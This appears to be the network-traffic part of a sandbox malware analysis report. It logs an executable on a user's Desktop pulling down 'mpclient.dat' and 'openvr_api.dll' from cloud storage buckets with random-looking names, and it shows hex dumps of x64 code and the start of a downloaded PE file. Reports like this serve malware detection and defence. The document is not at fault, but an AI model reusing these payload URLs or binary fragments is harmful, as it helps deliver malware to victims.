2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 24 28 44 89 74 24 20 45 33 c9 41 b8 4a 02 00 00 48 8d 15 bd ef 01 00 e8 a8 87 00 00 0f 57 c0 f3 0f 7f 45 b0 66 0f 6f 0d a8 e3 01 00 f3 0f 7f 4d b0 c6 45 a0 00 33 d2 48 8d 4d a0 e8 24 56 00 00 bb 02 00 00 00 84 c0 75 0e 48 8d 15 dc ef 01 00 8b cb e8 ad 90 00 00 48 8d 55 a0 48 83 7d b8 10 48 0f 43 55 a0 48 8d 0d e0 ef 01 00 e8 43 90 00 00 4c 8d 05 f4 ef 01 00 8b d3 48 8d 8d 48 02 00 00 ff 15 0d dd 01 00 89 05 f7 a6 02 00 4c 89 2d 00 a7 02 00 4c 89 2d 01 a7 02 00 4c 89 2d 02 a7 02 00 4c 89 2d 03 a7 02 00 4c 89 2d 0c a7 02 00 4c 89 2d 0d a7 02 00 4c 89 2d f6 a6 02 00 0f 57 c0 66 0f 7f 05 0b a7 02 00 4c 89 2d 14 a7 02 00 4c 89 2d 15 a7 02 00 4c 89 2d 16 a7 02 00 4c 89 2d e7 a6 02 00 4c 89 2d 10 a7 02 00 66 0f 7f 05 10 a7 02 00 0f 57 c9 66 0f 7f 0d 15 a7 02 00 Data Ascii: $(Dt$ E3AJHWEfoME3HM$VuHHUH}HCUHCLHHL-L-L-L-L-L-L-WfL-L-L-L-L-fWf
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 01 00 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 54 24 10 57 48 83 ec 20 48 8b f9 48 8b da 48 8d 0d b4 89 02 00 e8 a7 95 01 00 85 c0 74 07 8b c8 e8 a8 95 01 00 48 8b 97 e8 00 00 00 48 8d 8f e0 00 00 00 48 8b 01 48 3b c2 74 0e 48 39 18 74 27 48 83 c0 08 48 3b c2 75 f2 48 8b 51 08 48 39 51 10 74 0a 48 89 1a 48 83 41 08 08 eb 0a 4c 8d 44 24 38 e8 52 f8 ff ff 48 8d 0d 5b 89 02 00 e8 54 95 01 00 85 c0 74 07 8b c8 e8 4f 95 01 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 6c 24 18 48 89 7c 24 20 41 56 48 83 ec 50 49 8b e8 4c 8b f2 48 8b f9 e8 92 b3 00 00 48 85 c0 0f 84 58 01 00 00 4d 85 f6 0f 84 4f 01 00 00 48 89 5c 24 60 48 89 74 24 68 e8 71 b3 00 00 48 8b c8 48 8d 54 24 30 e8 74 af 00 00 4c 8b 44 24 30 48 8b 74 24 38 4c 3b c6 74 54 49 8d 58 08 90 48 83 7b Data Ascii: H\$HT$WH HHHtHHHH;tH9t'HH;uHQH9QtHHALD$8RH[TtOH\$0H _Hl$H\|$ AVHPILHHXMOH\$`Ht$hqHHT$0tLD$0Ht$8L;tTIXH{
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 0f 1f 40 00 48 8b 43 10 80 78 19 00 75 25 48 8b d8 eb f1 90 48 8b 48 08 80 79 19 00 75 0a 48 3b 01 75 05 48 8b c1 eb ec 48 8b d8 80 78 19 00 48 0f 44 d9 8b 43 40 41 3b c6 74 05 0f 92 c0 eb 3e 48 8b d6 48 83 7e 18 10 72 03 48 8b 16 48 8d 4b 20 48 83 7b 38 10 72 04 48 8b 4b 20 4c 8b 43 30 4c 3b 46 10 75 09 e8 4f 76 01 00 85 c0 74 5b 48 8b d6 48 8d 4b 20 e8 f9 11 00 00 c1 e8 1f 84 c0 74 48 48 8b 43 10 49 8b d4 49 8b cd 80 78 19 00 48 8b 84 24 a0 00 00 00 48 89 44 24 28 48 89 74 24 20 74 13 4c 8b cb 45 33 c0 e8 e5 fa ff ff 49 8b c4 e9 67 01 00 00 4c 8b cf 41 b0 01 e8 d2 fa ff ff 49 8b c4 e9 54 01 00 00 8b 47 40 41 3b c6 74 05 0f 92 c0 eb 42 48 8b d6 48 83 7e 18 10 72 03 48 8b 16 48 8d 4f 20 48 83 7f 38 10 72 04 48 8b 4f 20 4c 8b 47 30 4c 3b 46 10 75 0d e8 b8 Data Ascii: @HCxu%HHHyuH;uHHxHDC@A;t>HH~rHHK H{8rHK LC0L;FuOvt[HHK tHHCIIxH$HD$(Ht$ tLE3IgLAITG@A;tBHH~rHHO H8rHO LG0L;Fu
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 10 48 8b c6 48 83 fa 10 72 03 48 8b 06 48 8d 1c 08 41 b8 01 00 00 00 48 8b cb 48 8d 15 ff 98 01 00 e8 a8 56 01 00 44 88 73 01 eb 21 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d e2 98 01 00 44 0f b6 c0 48 8b ce 8d 50 01 e8 bf 72 ff ff 48 8b 56 18 48 8b 4e 10 48 8b c2 48 2b c1 48 83 f8 01 72 30 48 8d 41 01 48 89 46 10 48 83 fa 10 72 03 48 8b 36 48 8d 1c 0e 41 b8 01 00 00 00 48 8b cb 48 8d 15 96 98 01 00 e8 43 56 01 00 44 88 73 01 eb 21 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d 79 98 01 00 44 0f b6 c0 48 8b ce 8d 50 01 e8 5a 72 ff ff 4d 85 e4 74 08 41 c7 04 24 02 00 00 00 48 8b 54 24 68 48 83 fa 10 72 35 48 8b 4c 24 50 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 fb 7a 01 00 cc e8 39 45 01 00 Data Ascii: HHrHHAHHVDs!3HD$ LDHPrHVHNHH+Hr0HAHFHrH6HAHHCVDs!3HD$ LyDHPZrMtA$HT$hHr5HL$PHHHrHIH'H+HHvz9E
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 48 83 fa 10 72 36 48 8b 0b 48 ff c2 48 89 54 24 48 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 48 89 54 24 48 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1d 49 8b c8 e8 04 26 01 00 48 89 73 10 48 c7 43 18 0f 00 00 00 c6 03 00 48 83 c3 20 eb a1 ff 15 a5 5b 01 00 4c 89 6c 24 20 48 8b 9c 24 e0 00 00 00 48 8b 43 08 4d 8d 77 20 48 89 7c 24 58 0f 1f 00 48 3b f8 74 36 49 89 76 10 49 89 76 18 0f 10 07 41 0f 11 06 0f 10 4f 10 41 0f 11 4e 10 48 89 77 10 48 c7 47 18 0f 00 00 00 c6 07 00 49 83 c6 20 48 83 c7 20 48 89 7c 24 58 eb c5 49 8b de 48 89 5c 24 68 49 3b de 74 5c 48 8b 53 18 48 83 fa 10 72 36 48 8b 0b 48 ff c2 48 89 54 24 60 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 48 89 54 24 60 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1d 49 8b c8 e8 44 25 01 00 48 89 73 Data Ascii: Hr6HHHT$HHrH'HT$HLAI+HAHwI&HsHCH [Ll$ H$HCMw H\|$XH;t6IvIvAOANHwHGI H H\|$XIH\$hI;t\HSHr6HHHT$`HrH'HT$`LAI+HAHwID%Hs
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 00 3c 01 00 cc 49 8b c8 e8 3b 06 01 00 0f b6 c3 48 8b 9c 24 a0 00 00 00 48 81 c4 90 00 00 00 5d c3 e8 e6 43 ff ff cc cc cc cc cc cc 48 89 74 24 08 57 48 83 ec 40 49 8b f9 48 8b f1 44 0f b6 4c 24 70 48 8d 4c 24 20 e8 70 00 00 00 44 0f b6 4c 24 70 48 8b d0 4c 8b c7 48 8b ce e8 5c 00 00 00 48 8b 54 24 38 48 83 fa 10 72 35 48 8b 4c 24 20 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 6a 3b 01 00 cc e8 a8 05 01 00 48 8b c6 48 8b 74 24 50 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 80 00 00 00 45 84 c9 41 0f b6 c1 be 5c 00 00 00 49 8b f8 0f 45 f0 48 8b d9 48 8b 42 10 4c 8b c0 48 85 c0 75 0d 48 8b d7 e8 65 a5 ff ff e9 9c 01 00 00 48 8b 4a Data Ascii: <I;H$H]CHt$WH@IHDL$pHL$ pDL$pHLH\HT$8Hr5HL$ HHHrHIH'H+HHvj;HHt$PH@_H\$Ht$WHEA\IEHHBLHuHeHJ
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 41 80 c0 30 45 88 01 44 8b c2 85 d2 75 d6 66 0f 6f 05 ee 23 01 00 48 8d 45 35 40 88 7d 90 f3 0f 7f 45 a0 4c 3b c8 74 13 4c 8d 45 35 49 8b d1 4d 2b c1 48 8d 4d 90 e8 f9 23 ff ff 48 8b 55 a8 48 8b 4d a0 48 8b c2 48 2b c1 48 83 f8 01 72 37 48 83 fa 10 48 8d 41 01 48 8d 5d 90 48 89 45 a0 48 0f 43 5d 90 48 8d 15 d1 4b 01 00 48 03 d9 41 b8 01 00 00 00 48 8b cb e8 6a f6 00 00 48 8d 45 90 40 88 7b 01 eb 22 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d a4 4b 01 00 44 0f b6 c0 48 8d 4d 90 8d 50 01 e8 7c 12 ff ff 48 89 7c 24 60 48 89 7c 24 68 0f 10 00 0f 11 44 24 50 0f 10 48 10 0f 11 4c 24 60 48 89 78 10 48 89 70 18 40 88 38 4c 8b 54 24 68 48 8b 54 24 60 49 8b ca 4c 8b 75 c0 48 2b ca 4c 8b 45 c8 4c 3b f1 76 2a 49 8b c0 49 2b c6 48 3b c2 72 1f 49 83 fa 10 4c 8d 44 24 50 Data Ascii: A0EDufo#HE5@}EL;tLE5IM+HM#HUHMHH+Hr7HHAH]HEHC]HKHAHjHE@{"3HD$ LKDHMP\|H\|$`H\|$hD$PHL$`HxHp@8LT$hHT$`ILuH+LEL;v*II+H;rILD$P
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: d6 00 00 85 c0 78 14 0f 8f 9d 02 00 00 41 3b df 0f 92 c0 84 c0 0f 84 8f 02 00 00 48 8b 84 24 d0 00 00 00 48 89 44 24 28 48 89 74 24 20 4c 8b cf 41 b0 01 49 8b d6 49 8b cc e8 9e fc ff ff 49 8b c6 e9 8d 02 00 00 48 3b f9 75 7f 48 8b 79 10 8b 5f 28 48 83 7f 20 00 75 05 41 3b 1f eb 36 c1 eb 02 89 5c 24 38 45 8b 3f 41 c1 ef 02 44 89 7c 24 3c 44 8b c3 44 3b fb 45 0f 42 c7 49 8b 11 48 8b 4f 20 e8 5b d6 00 00 85 c0 78 14 0f 8f 19 02 00 00 41 3b df 0f 92 c0 84 c0 0f 84 0b 02 00 00 48 8b 84 24 d0 00 00 00 48 89 44 24 28 48 89 74 24 20 4c 8b cf 45 33 c0 49 8b d6 49 8b cc e8 1a fc ff ff 49 8b c6 e9 09 02 00 00 41 8b 1f 49 83 39 00 75 06 41 3b 58 28 eb 37 c1 eb 02 89 5c 24 40 45 8b 68 28 41 c1 ed 02 44 89 6c 24 44 44 8b c3 44 3b eb 45 0f 42 c5 48 8b 57 20 49 8b 09 e8 Data Ascii: xA;H$HD$(Ht$ LAIIIH;uHy_(H uA;6\$8E?AD\|$<DD;EBIHO [xA;H$HD$(Ht$ LE3IIIAI9uA;X(7\$@Eh(ADl$DDD;EBHW I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	159.75.57.35	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:13 UTC	116	OUT	GET /mpclient.dat HTTP/1.1 Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com Connection: Keep-Alive
2025-01-16 12:44:14 UTC	553	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 334805 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:14 GMT ETag: "8d64d97085f6aa11d1375879095d996c" Last-Modified: Tue, 07 Jan 2025 19:41:28 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 16661970189357130763 x-cos-request-id: Njc4OGZmMWVfMTg3NWMyMWVfZmQ1YV8xNDcxYTQ0Ng== x-cos-server-side-encryption: AES256 x-cos-storage-class: MAZ_STANDARD x-cosindex-replication-status: Complete
2025-01-16 12:44:14 UTC	7651	IN	Data Raw: e8 c0 b9 04 00 c0 b9 04 00 b9 a6 1a 0c 8f 6c c0 cc 70 75 e6 6b c6 7c e3 73 00 13 a5 89 3b d3 2c cd 4e 5f 5a 49 29 26 a3 8d 00 00 00 00 f9 38 c8 4b 39 79 51 a1 6e ba 73 d6 5c 53 5c 80 75 45 65 2a 31 0d 4b fe 82 41 1f 88 85 c8 89 37 da e8 5f e2 9a f3 36 d3 92 5c c1 3b 4d f4 52 1f e5 28 4b d5 ab 69 35 c9 1e 45 ce 71 bc 81 7a 78 a3 af 30 b2 b7 ec d6 12 f3 a9 30 8e 02 b4 dc 3d ea c1 b1 50 a9 43 6e d8 68 f0 bd d9 fb 85 ff 68 b6 7c 17 03 a9 dc e5 fb f3 98 e1 56 7d ef 42 0f 70 2e 1f a6 c6 bc cb 37 54 64 34 af 21 9c bf 80 79 39 05 3c 2c b4 7a d8 8b 4d 93 56 3e 2d 2d be 0d 73 5c f8 ea 08 af 74 87 cb dc 66 f3 71 50 2c f8 17 cf ea f2 f1 88 46 98 0c 46 4e 6f cf 67 38 68 6e 96 12 a9 78 31 2b 5a 4f e8 ff e6 30 ec 6c 6c d1 29 49 dd c9 fb 6d 4a 0c d8 15 bf 34 20 b8 86 38 Data Ascii: lpuk\|s;,N_ZI)&8K9yQns\S\uEe*1KA7_6\;MR(Ki5Eqzx00=PCnhh\|V}Bp.7Td4!y9<,zMV>--s\tfqP,FFNog8hnx1+ZO0ll)ImJ4 8
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: 1d 4e 99 f6 5e 46 e9 81 a9 46 d2 75 63 2f 43 fb a3 4b d1 39 31 83 bb 50 ac 95 ba 63 d3 fc 2d 21 3d d5 f8 de 74 33 25 c4 02 40 5e 45 1e c5 b0 fe 4c 91 ae c1 66 ff 11 eb fd bd af 4a 2f bd 82 e8 ac 58 01 e4 71 9e 73 e7 c1 51 1d dc 74 85 10 ad d2 7b 85 3b ae bd 6d da f1 0d 6b e0 09 8c 30 f7 f7 91 be 80 7e 80 ff 2b f9 e5 9c 18 f1 c8 4a b5 07 47 ef 9e ba 90 37 28 b0 c2 a8 d9 02 4c 59 86 fe 87 98 37 6d 99 27 94 93 52 9a 90 ad ca ac 8a 0e 85 f7 1b 66 73 b8 48 45 04 bf 83 20 8d e0 21 06 48 31 fb 0f ca 8d 76 12 7c 6a 3b 87 be 3b 9f 3c 01 eb 67 f8 a9 ca 03 a8 09 cb ee e3 27 a1 26 b5 5c 6f 82 e4 0f 9a b1 31 ff 4a 24 81 58 b1 ed dd 93 3a ec e2 a8 1b 81 12 7e a9 bc 95 0b 66 07 e8 c1 cc 51 d8 a1 8a 91 6e 1b 3d 42 4b cf db 2e 5e 90 5b 2b 5e d9 41 ba 48 bb 21 84 4a 17 11 Data Ascii: N^FFuc/CK91Pc-!=t3%@^ELfJ/XqsQt{;mk0~+JG7(LY7m'RfsHE !H1v\|j;;<g'&\o1J$X:~fQn=BK.^[+^AH!J
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: a9 cf 30 0d 0f 8c 57 51 5e a7 02 37 f2 ee d7 a3 c4 61 7d 37 64 66 44 5a 6f 40 f6 94 5a 54 6d e3 ef 0a 57 06 6e 50 9a 58 64 ca f3 11 4b 76 4e 64 4a 6d 15 6b 9f 1a d0 44 65 f7 98 7e 3e 09 5e 5c ab 19 91 91 93 eb 29 3d ca ab 22 14 b9 a0 49 83 00 f0 c1 95 73 8c 56 57 96 48 b0 b7 12 3e 09 e9 d1 1a 93 b6 30 55 34 50 6b 2d fc 7b 59 ad e5 06 21 56 36 53 3e 19 df 83 c7 3c 4d 87 fc f3 ea 76 b4 b0 11 90 8d 7c 86 56 51 6b a5 01 14 3a 59 72 3c 8c 3c ef 1f f4 60 b3 1b 98 cf 34 5d 4f f8 26 da 43 65 b1 09 e7 19 4b e8 0b 8a 84 b8 5f 32 10 dc aa d5 ae d2 1e da 4a 1b 78 9e 56 f1 6d c7 de 5a 0d 04 04 22 5e c7 27 94 6f 99 90 43 f2 1e 2d 06 d0 b4 bc d5 82 e7 1b 78 f8 52 3a d1 5c b7 ea 3b 00 0b 96 40 bb 5b 05 9c 5c 00 5e 73 03 b6 2d dc 8a 90 68 84 1f 91 26 22 c9 07 8b 1f fe d9 Data Ascii: 0WQ^7a}7dfDZo@ZTmWnPXdKvNdJmkDe~>^\)="IsVWH>0U4Pk-{Y!V6S><Mv\|VQk:Yr<<`4]O&CeK_2JxVmZ"^'oC-xR:\;@[\^s-h&"
2025-01-16 12:44:14 UTC	16384	IN	Data Raw: f7 17 35 10 53 71 9b ce e9 da 18 12 52 5a 57 74 34 13 a9 cc 5e 1b 29 d9 12 b2 36 d8 8a f2 77 7b f2 68 bf 29 7a 71 c2 da 93 27 bc 28 3f cd a8 a7 23 ce b6 93 5d 4d ef df 40 06 30 b4 89 28 33 cc cf b0 fb bc c5 9a 21 2f 4d b3 ee c1 22 3d f8 e9 84 1f 78 9d f7 85 ab a5 2a df da a6 e3 92 8e 3f 9d 5d ed 9a c2 94 2a 94 22 0e 97 4c c1 94 2c 11 76 a0 f4 6e 1f 9e 8f c0 c1 b2 7f 05 ce b5 26 1a be 41 d9 a8 e1 23 68 99 7d d6 34 8c c9 a9 b5 b0 29 d1 c0 74 ef 2f a7 d9 a4 70 48 a0 7f 37 17 da ee c1 6c 65 b1 86 07 ba c0 2b 2d de d2 e4 b8 92 69 b8 db 69 82 87 9d 7c 25 3b 61 41 6b af f8 d9 f4 4f cf eb 13 88 77 39 8f 0a a2 36 28 dd 5d c0 14 48 fd 54 d4 2b 57 2e 07 3f 99 72 83 25 9d c5 30 8c 4e c6 4d 24 c3 6a 15 13 e7 2e 72 64 64 5d 39 47 cd a0 43 35 0d bc 6d f1 28 2d a1 6f eb Data Ascii: 5SqRZWt4^)6w{h)zq'(?#]M@0(3!/M"=x?]"L,vn&A#h}4)t/pH7le+-ii\|%;aAkOw96(]HT+W.?r%0NM$j.rdd]9GC5m(-o
2025-01-16 12:44:14 UTC	16352	IN	Data Raw: 8e 50 a7 32 a7 e7 86 c8 f6 bc 7a 7b 2c 0f 5c 3f 5e 1e af 0d d7 9a ab f6 e2 bd f8 34 12 90 2f 8d 53 da af 77 0d 99 f5 a9 60 07 5f 08 0b 94 3b 20 9d fc 14 7e 2d d9 f5 d0 2a b7 03 20 0d 72 60 02 e2 b2 e0 99 cd 77 a5 69 70 a8 9d 6a ed 7b 2f 3d e3 8d 79 63 fb a5 79 32 90 90 7b 4a 06 53 f8 81 cd 57 e7 e0 88 26 45 97 b1 0e 0a cd 2a ec 02 90 b6 1e ef b2 0b fa 7f df b9 64 c7 14 10 e6 10 56 bf ab a2 5a 21 67 26 c4 72 a3 59 7c ac 64 8b bc 28 ce 4c b6 87 68 fd a2 31 3d da b8 b3 0e 7c 75 ae 42 f7 9e 17 78 53 01 cb 7d 34 db 01 26 dd b3 7a cf 13 55 ff 1b a7 ec 8f 87 0f 3c a9 11 16 f1 c3 15 be ca 13 1a 58 6a 6c 1b 0d c1 b3 e0 c1 47 27 ef bc 43 57 8e 74 f8 fc 76 72 03 aa f8 be 04 fc c4 a9 30 ff 18 ad 4e 25 c4 42 93 49 ec 2d 9f 10 1c 59 08 1f 96 d0 1f c4 1c bf 5d b7 c3 85 Data Ascii: P2z{,\?^4/Sw`_; ~-* r`wipj{/=ycy2{JSW&E*dVZ!g&rY\|d(Lh1=\|uBxS}4&zU<XjlG'CWtvr0N%BI-Y]
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: 16 8c e2 e0 14 e1 ce 69 53 60 13 42 99 2f be 09 a6 b2 b3 7f b9 b0 f0 2e bf dc 28 1f 50 ce b8 47 ab ac f8 2f 34 ff 7b 32 99 40 94 6b e4 a5 c2 86 fd f0 56 d0 5b 24 55 cb b4 26 36 f1 69 f4 5e a8 3c 27 98 09 b1 71 5e ea 6a 5b 0a 77 8c 0e 60 1e ce ae 49 b6 7b 4b 42 70 42 62 de 1c fb 59 10 df 1f e3 4e f7 a7 04 b6 41 71 e7 10 cc 5a 33 c1 9e 47 84 18 ac 74 f4 c5 d9 20 a7 4b 4f c5 39 b3 58 71 3d 42 0c 94 7a 96 fe 8d 89 87 21 78 96 ed 7b 36 79 b7 ac 7c 76 66 52 b4 8b 2b 76 9a 09 f0 3d 0c 48 4a 70 7a 8c ac 0b 74 41 59 ba 46 93 37 ae f8 02 31 e9 f3 b9 5e c2 8b 5e 72 c0 3f 1c c2 41 ca 6a bf 86 f7 7b a6 a8 8d 17 ae 92 22 34 85 df 38 89 84 32 53 9b dd 56 f7 11 4a 8b a6 16 1c 10 24 29 00 bf 3a 52 c1 ca 19 6c d9 90 79 6e e1 76 af 97 c3 47 fc b5 ff 94 6a 6d 32 0c 82 41 5f Data Ascii: iS`B/.(PG/4{2@kV[$U&6i^<'q^j[w`I{KBpBbYNAqZ3Gt KO9Xq=Bz!x{6y\|vfR+v=HJpztAYF71^^r?Aj{"482SVJ$):RlynvGjm2A_
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: 74 2c 9b cf 8b 26 b5 63 98 a0 13 27 71 47 b2 b0 60 4b d3 25 e1 cd ec a8 e2 b1 48 8f c3 8c 54 b0 d5 a7 d6 a5 97 4c 4a 0f ec d8 7a 26 ea 1c 09 b6 e9 3a 85 12 81 f5 b5 3e b8 8b 0e d9 df 4c 6b be f7 75 b0 c0 e1 1b e4 75 85 19 5a 79 d2 4d 54 31 1d 30 0e ba fd 24 57 5f bb 8d 7d a1 48 8f 7c 5d 2f 4d d4 48 51 05 d1 59 85 7b d4 f9 51 4c a6 c2 d4 fc 46 77 17 64 de 1f b5 74 ff 95 3f 9b 46 47 da 2a 72 8e ae 54 aa cc 8d 64 dd a3 74 58 e1 18 12 22 3b ac 51 42 ff 0f 3e 31 ca 90 52 43 9e 23 d8 12 4f 18 61 3d b8 8a 55 2c 4d 9c d0 f1 55 ab fa c8 7d 7a 4b f8 78 56 49 c6 54 31 cb 31 9e ed e8 8e e1 fd c3 67 1f 74 e9 6b 63 38 82 c2 03 e2 be 64 29 99 d1 9f e2 58 03 b6 2b df d3 d2 e1 67 53 a3 bf 13 74 b5 7c db ae cb 59 7e 29 de dd 7a bf 70 67 5b ec 89 96 eb ef b0 33 fc f6 9a 82 Data Ascii: t,&c'qG`K%HTLJz&:>LkuuZyMT10$W_}H\|]/MHQY{QLFwdt?FG*rTdtX";QB>1RC#Oa=U,MU}zKxVIT11gtkc8d)X+gSt\|Y~)zpg[3
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: c3 5a 09 98 1b d0 aa 2e 61 7e 07 c0 2e 7e 2e 5d 05 f4 13 d8 3b 26 30 14 c3 89 a7 43 dc 78 3b 4d 1c e3 af 72 73 ff f5 1b 18 50 85 51 21 aa 02 b2 9a e0 90 71 90 2d 4e 88 14 82 d2 25 20 99 ba 95 55 82 1f cc f4 62 9c 79 ab ad df 00 65 11 01 0d 02 67 97 ca be 33 b4 fa e0 86 f5 80 a8 e0 d5 70 b1 b8 6f 67 07 4f 64 59 36 59 ba a0 62 92 8f 85 e5 bb 52 0f 1b 98 95 d1 2c 4a 3f 89 c7 f6 e8 bb d2 7d 04 00 2d 95 b8 0a 99 ea 2d 9d c2 d2 4c de 37 43 6f a5 c6 bb f9 2f bd 36 88 65 96 96 14 51 c1 16 34 d5 59 f6 ad fd 54 4b e6 63 a8 c3 5f 2a 5c e8 e7 50 9f 90 95 00 27 db fd dc 52 73 15 f1 a4 e7 71 ca 51 c6 51 da d9 66 2b e4 54 8a 1b ea 8f 4c 92 ce 12 ce 04 81 7a ef de 39 5f 5a 71 96 2b dc e6 78 d0 de c5 fe 79 a8 55 fa 62 31 95 3b 30 c5 ca 4b 42 d3 32 2b 15 93 71 cc 2d 8d 19 Data Ascii: Z.a~.~.];&0Cx;MrsPQ!q-N% Ubyeg3pogOdY6YbR,J?}--L7Co/6eQ4YTKc_*\P'RsqQQf+TLz9_Zq+xyUb1;0KB2+q-
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: b3 b9 70 26 0a 51 e1 08 cc 03 96 3f bd 63 7d 42 69 ba da 55 fa 18 ab 68 a7 bc b2 db bf bf 93 a2 96 e4 6d 92 44 8f 24 30 2f b4 fd 68 19 49 f7 e3 d1 b9 bc 8f 4f 78 48 6b a4 96 0d c2 a5 ad a4 c8 92 fd 64 61 65 3b 53 ed 8d 9e 18 28 21 05 d2 61 17 34 ed 4b 5c cb f8 21 e6 c5 3a 08 b6 2f af da 89 92 13 1d d1 b0 5b 8f 30 d9 64 dc 0b 4a 37 85 3d ce 72 59 99 f0 b0 4a 10 95 2e 8f b7 88 e9 7b e6 37 bf 79 b2 e6 8a c7 82 37 65 c1 90 ae 55 17 7b 19 c1 51 46 d5 a5 4e df 05 1d f2 5d e5 23 3f 3b 7a 57 5f 21 14 2f cc df ee 59 74 05 b3 2f e0 3d db 85 f2 1f 8a 53 17 82 8e 65 4f f1 39 5a e9 d3 8f 65 11 58 f8 c0 72 c9 fd 15 3c 97 4f d4 53 83 b0 86 82 7a 3a b5 c1 c5 c2 67 0a 43 97 23 75 52 8d de 37 62 d1 ce c0 ca 37 d7 be 9e 61 af 5a 0c 8c 6f 31 7c e8 13 99 b7 e1 ba f4 8a fa 17 Data Ascii: p&Q?c}BiUhmD$0/hIOxHkdae;S(!a4K\!:/[0dJ7=rYJ.{7y7eU{QFN]#?;zW_!/Yt/=SeO9ZeXr<OSz:gC#uR7b7aZo1\|
2025-01-16 12:44:14 UTC	8184	IN	Data Raw: d6 6a 18 6f 39 91 88 95 6b 99 3b 2d db 4d 9e b4 8d 08 37 9d 3a 87 27 51 d3 80 31 c2 a8 75 71 cf 87 0a fd b6 74 f7 73 84 7d 46 61 38 41 e6 30 5d 8b 8c 76 f7 aa f4 0b 81 35 5c ae b4 3a dd 5f 62 be e3 b2 f6 70 d2 2c 1d cc da 29 e0 31 c6 70 88 7e 66 75 2a 53 7d e3 b5 f9 12 f7 34 f2 ba dc ab d1 5a 55 64 58 54 88 7e 0b 62 a8 23 94 af 2d 9b 05 6f ff d3 16 47 65 bd 5c f3 a9 13 1e 11 96 d7 90 da 20 1a af 91 08 c5 a7 26 ad dd 23 c8 d2 35 48 19 89 59 02 18 54 d5 2d 6d b0 b1 2d 66 63 d3 73 95 cd f3 dc ab 92 5e 68 95 df 06 db 13 2b eb a4 f2 09 1b 8b 13 64 02 63 fc 6d c7 1f 1d 5c c9 ed 73 b5 95 e6 73 5a 3f 94 91 f2 7e 2b a9 49 45 43 3e b3 71 f6 77 80 6c 2a b1 a3 e9 9b 76 bd 09 f8 e4 82 35 00 20 71 32 14 f9 7e dc c7 80 8e f8 78 c9 46 3d 29 d6 43 96 18 a7 e6 94 5b 16 89 Data Ascii: jo9k;-M7:'Q1uqts}Fa8A0]v5\:_bp,)1p~fuS}4ZUdXT~b#-oGe\ &#5HYT-m-fcs^h+dcm\ssZ?~+IEC>qwlv5 q2~xF=)C[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	183.66.100.51	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:16 UTC	96	OUT	GET /openvr_api.dll HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
2025-01-16 12:44:16 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 379904 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:16 GMT ETag: "366710963f426b54b6e06657b26a5cbb" Last-Modified: Tue, 14 Jan 2025 12:37:01 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 5056899690438975135 x-cos-request-id: Njc4OGZmMjBfNDYxMzNmMGJfMzhmZF9mMDU3YTJh x-cos-server-side-encryption: AES256
2025-01-16 12:44:16 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0a 20 e7 f6 4e 41 89 a5 4e 41 89 a5 4e 41 89 a5 3c c0 8c a4 c0 41 89 a5 3c c0 8d a4 42 41 89 a5 3c c0 8a a4 46 41 89 a5 5e c5 8a a4 47 41 89 a5 5e c5 8d a4 40 41 89 a5 5e c5 8c a4 6b 41 89 a5 3c c0 88 a4 4b 41 89 a5 4e 41 88 a5 28 41 89 a5 05 c4 80 a4 4f 41 89 a5 05 c4 89 a4 4f 41 89 a5 05 c4 76 a5 4f 41 89 a5 05 c4 8b a4 4f 41 89 a5 52 